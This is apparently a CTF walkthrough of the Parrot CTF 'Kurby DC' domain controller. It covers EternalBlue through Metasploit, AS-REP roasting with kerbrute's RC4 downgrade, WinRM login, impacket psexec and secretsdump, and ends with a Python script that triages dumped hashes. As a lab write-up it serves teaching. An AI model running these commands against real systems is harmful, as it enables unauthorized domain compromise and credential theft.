Kurby DC Parrot CTF Walkthrough
Hello guys, welcome back to another walkthrough. This time we are tackling Kurby DC from Parrot CTF. I would rate the box as easy, since a single bug (EternalBlue, MS17-010) is enough to get a SYSTEM shell on the domain controller, which is as good as domain admin. We start with an nmap scan and discover the box is a domain controller. The SMB service leaks the exact Windows build, and a quick search shows that build is a candidate for EternalBlue. We use Metasploit to exploit it and land a SYSTEM shell. That turns out to be an unintended path, so we go back: the user kurby, whose name we picked up from the profile directory during the first shell, does not require Kerberos pre-authentication. We abuse that (AS-REP roasting) to obtain an AS-REP whose encrypted part we can crack offline to recover the user's password. With those credentials we log in over Windows Remote Management and find the user is a local administrator, which lets us use impacket's psexec to get a SYSTEM shell on the DC. Without further ado, let's jump in.
As always we start off with an nmap scan of the box, which shows a handful of open ports. The command we ran was
nmap -sC -sV -oA nmap/kurby -Pn 10.14.3.242
The results are as seen below
cat nmap/kurby.nmap
# Nmap 7.94SVN scan initiated Mon Jul 15 19:33:51 2024 as: nmap -sC -sV -oA nmap/kurby -Pn 10.14.3.242
Nmap scan report for 10.14.3.242
Host is up (0.23s latency).
Not shown: 989 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-13 10:30:16Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kurby.local, Site: Default-First-Site-Name)
445/tcp open microsoft-ds Windows Server 2016 Standard Evaluation 14393 microsoft-ds (workgroup: KURBY)
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: kurby.local, Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
Service Info: Host: WIN-0S9I9H1N8LS; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-os-discovery:
| OS: Windows Server 2016 Standard Evaluation 14393 (Windows Server 2016 Standard Evaluation 6.3)
| Computer name: WIN-0S9I9H1N8LS
| NetBIOS computer name: WIN-0S9I9H1N8LS\x00
| Domain name: kurby.local
| Forest name: kurby.local
| FQDN: WIN-0S9I9H1N8LS.kurby.local
|_ System time: 2024-07-13T03:30:32-07:00
|_nbstat: NetBIOS name: WIN-0S9I9H1N8LS, NetBIOS user: <unknown>, NetBIOS MAC: 00:ff:6c:bd:f2:17 (unknown)
| smb2-time:
| date: 2024-07-13T10:30:32
|_ start_date: 2024-07-13T08:51:14
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: required
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
|_clock-skew: mean: -2d03h44m21s, deviation: 4h02m29s, median: -2d06h04m22s
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Jul 15 19:35:10 2024 -- 1 IP address (1 host up) scanned in 79.08 seconds
Looking at the script scan output for SMB we notice that the server leaks its exact version: port 445 and the smb-os-discovery script both report Windows Server 2016 Standard Evaluation 14393. The rest of the port list (DNS on 53, Kerberos on 88, LDAP on 389/636 and the global catalog on 3268/3269, with the domain kurby.local in the LDAP banner) tells us this host is a domain controller. Also note the clock-skew line: our clock is roughly two days off from the DC's, which is worth remembering if Kerberos tooling complains later.
Googling that build suggests the server may be vulnerable to EternalBlue (MS17-010). A build number alone does not tell you whether the patch is installed, so it is worth confirming with nmap's smb-vuln-ms17-010 script or Metasploit's auxiliary/scanner/smb/smb_ms17_010 module before firing the exploit.
The following article is a nice read:
https://gist.github.com/05t3/7d5925e6a4585abe2a48cc4a978aea87
To exploit the vulnerability we use the Metasploit Framework, which comes preinstalled on Kali Linux.
I opened the framework with the command
msfconsole
Then I searched for EternalBlue modules and a few results came up. I used the module
exploit/windows/smb/ms17_010_psexec
Next I set LHOST and RHOSTS to the attacker's and the victim's IP addresses respectively.
Running the exploit gives us a Meterpreter session running as NT AUTHORITY\SYSTEM on the domain controller.
That is enough to read both user.txt and root.txt.
But looking at how the box is presented on the platform, this seems to be an unintended path, so let's also walk the intended one.
From the first shell I took the name kurby, which was the user's profile directory name, and saved it in a file called users. Then I ran user enumeration with kerbrute, which also reports accounts that do not require Kerberos pre-authentication. The command used was
kerbrute userenum --dc 10.14.3.242 -d kurby.local users
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/15/24 - Ronnie Flathers @ropnop
2024/07/15 20:22:29 > Using KDC(s):
2024/07/15 20:22:29 > 10.14.3.242:88
2024/07/15 20:22:29 > [+] kurby has no pre auth required. Dumping hash to crack offline:
$krb5asrep$18$kurby@KURBY.LOCAL:5e9ddaa4fde77be1f665e49fdde583a8$[remainder of hash truncated]
2024/07/15 20:22:29 > [+] VALID USERNAME: kurby@kurby.local
2024/07/15 20:22:29 > Done! Tested 1 usernames (1 valid) in 0.266 seconds
kerbrute reports that kurby has no pre-auth required and dumps an AS-REP hash, which I saved to a file.
Trying to crack it with John the Ripper fails. Looking at the hash, it is encryption type 18 (AES256-CTS-HMAC-SHA1-96), where the key is derived from the password with PBKDF2 over 4096 iterations, so it is both slower to crack and not handled by every cracker build. Kerbrute can instead ask the KDC for the legacy RC4-HMAC encryption type (etype 23), whose key is simply the NT hash of the password, by adding the --downgrade flag. This only works because the DC still allows RC4 for the account; a hardened domain may refuse the request.
The command will now become
kerbrute userenum --dc 10.14.3.242 -d kurby.local users --downgrade
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: dev (n/a) - 07/15/24 - Ronnie Flathers @ropnop
2024/07/15 20:27:53 > Using downgraded encryption: arcfour-hmac-md5
2024/07/15 20:27:53 > Using KDC(s):
2024/07/15 20:27:53 > 10.14.3.242:88
2024/07/15 20:27:54 > [+] kurby has no pre auth required. Dumping hash to crack offline:
$krb5asrep$23$kurby@KURBY.LOCAL:b82ef4534e1240dd8bf1a13f05db19db$6b0895b7c84311a9f3ba4c225cb437da23a8bd00fa9edc37227523c961e6cc966dea71ee0954e112e9fa3df0328205f55cf90cb577ebd26604ff9907169a34549732563329b8b26a2f4d7f202043f67948ad82a4d4f3d6e64e67fc05022725781c92ed64b3fc9e471d0cb52e4b07afbf82aa2bbb15687dc86032d76bd1d91ae25c79a5e548c93fd3f28f532f450c9c608cc4a0c4b43e4cf874c9c87f2d8787971d70417427c6735956ba22e9e42e4e7376644680ac7005e30f40ba62f7d5404d4806da16d818038d82f83a1613a8deb031b823a0b7aff2f65604b8a1a7b731b0d7819fc80810a94d802e
2024/07/15 20:27:54 > [+] VALID USERNAME: kurby@kurby.local
2024/07/15 20:27:54 > Done! Tested 1 usernames (1 valid) in 0.247 seconds
This time the hash cracks and we have the password for the user kurby. The technique is called AS-REP roasting: because the account has the DONT_REQ_PREAUTH flag set, anyone who knows the username can request an AS-REP without proving the password, and the KDC returns data encrypted under the user's key that can be brute-forced offline.
Using the credentials we can log in over Windows Remote Management (WinRM), which listens on 5985 (HTTP) and 5986 (HTTPS). Neither port appeared open in the scan above, so scan them explicitly before assuming WinRM is reachable.
The tool we use is evil-winrm, which also comes preinstalled on Kali Linux, and the command we run is
evil-winrm -i 10.14.3.242 -u kurby -p "alice@15"
Running whoami /all we see that the account has administrative privileges on the server.
Since kurby is a local administrator, I used impacket's psexec to get a SYSTEM shell; psexec needs admin rights because it writes a service binary to a writable share such as ADMIN$ and creates a service to run it. The command used was
psexec.py kurby.local/kurby@10.14.3.242
Lastly we can dump credential material with impacket's secretsdump. Against a domain controller it pulls the local SAM and LSA secrets from the registry and then the domain hashes from NTDS.dit over DRSUAPI; the excerpt below is the SAM portion, where on a DC the Administrator entry is the Directory Services Restore Mode account rather than the domain Administrator. The command is
secretsdump.py kurby.local/kurby@10.14.3.242
Impacket v0.12.0.dev1+20240711.104209.512a1db5 - Copyright 2023 Fortra
Password:
[*] Service RemoteRegistry is in stopped state
[*] Starting service RemoteRegistry
[*] Target system bootKey: 0x581833951da909c660aebc587055fc7b
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5faff1097a20866b6ca2e585e175c44a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
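As an added example (not part of the original post), here is a small Python triage over secretsdump-style output. It parses the uid:rid:lmhash:nthash::: records, flags accounts whose NT hash is the empty-password MD4 (the 31d6cfe0... value on Guest and DefaultAccount above), flags any account that still stores an LM hash, and groups accounts sharing an NT hash, which is how password reuse between a privileged account and a service account shows up in a dump. The sample input is constructed: the three SAM lines from the dump above plus two made-up NTDS-style entries (svc_backup and legacy) whose hash values are invented for illustration.

```python
from collections import defaultdict
from dataclasses import dataclass

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash of "": no LM hash is stored
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash (MD4) of "": blank password

# Constructed sample: the three SAM lines from the walkthrough plus two made-up
# NTDS-style lines; svc_backup deliberately reuses the Administrator NT hash and
# legacy carries an invented non-empty LM hash.
SAMPLE_DUMP = """\
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:5faff1097a20866b6ca2e585e175c44a:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
kurby.local\\svc_backup:1105:aad3b435b51404eeaad3b435b51404ee:5faff1097a20866b6ca2e585e175c44a:::
kurby.local\\legacy:1106:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

@dataclass
class HashEntry:
    user: str
    rid: int
    lm: str
    nt: str

def parse_secretsdump(text: str) -> list:
    """Keep only uid:rid:lmhash:nthash::: records; status lines like [*] ... are skipped."""
    entries = []
    for raw in text.splitlines():
        parts = raw.strip().split(":")
        if len(parts) < 4 or not parts[1].isdigit():
            continue
        lm, nt = parts[2].lower(), parts[3].lower()
        if len(lm) != 32 or len(nt) != 32:
            continue
        entries.append(HashEntry(parts[0], int(parts[1]), lm, nt))
    return entries

def triage(entries) -> dict:
    """Map user -> list of findings: blank password, stored LM hash, shared NT hash."""
    findings = defaultdict(list)
    by_nt = defaultdict(list)
    for e in entries:
        if e.nt == EMPTY_NT:
            findings[e.user].append("blank password")
        if e.lm != EMPTY_LM:
            findings[e.user].append("LM hash stored (trivially crackable)")
        by_nt[e.nt].append(e.user)
    for nt, users in by_nt.items():
        if nt != EMPTY_NT and len(users) > 1:  # same password on more than one account
            for u in users:
                findings[u].append("NT hash shared with " + ", ".join(x for x in users if x != u))
    return dict(findings)
```

Run parse_secretsdump over the dump and pass the result to triage: Guest and DefaultAccount come back as blank passwords (both are disabled by default, but the check still earns its keep on real user accounts), legacy is flagged for its LM hash, and Administrator and svc_backup are flagged for sharing an NT hash, which in a real engagement is the pass-the-hash pivot to look at first.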
And the box is pretty much done. I hope you enjoyed the walkthrough; if so, clap for me down below and follow me so you won't miss any upcoming walkthroughs.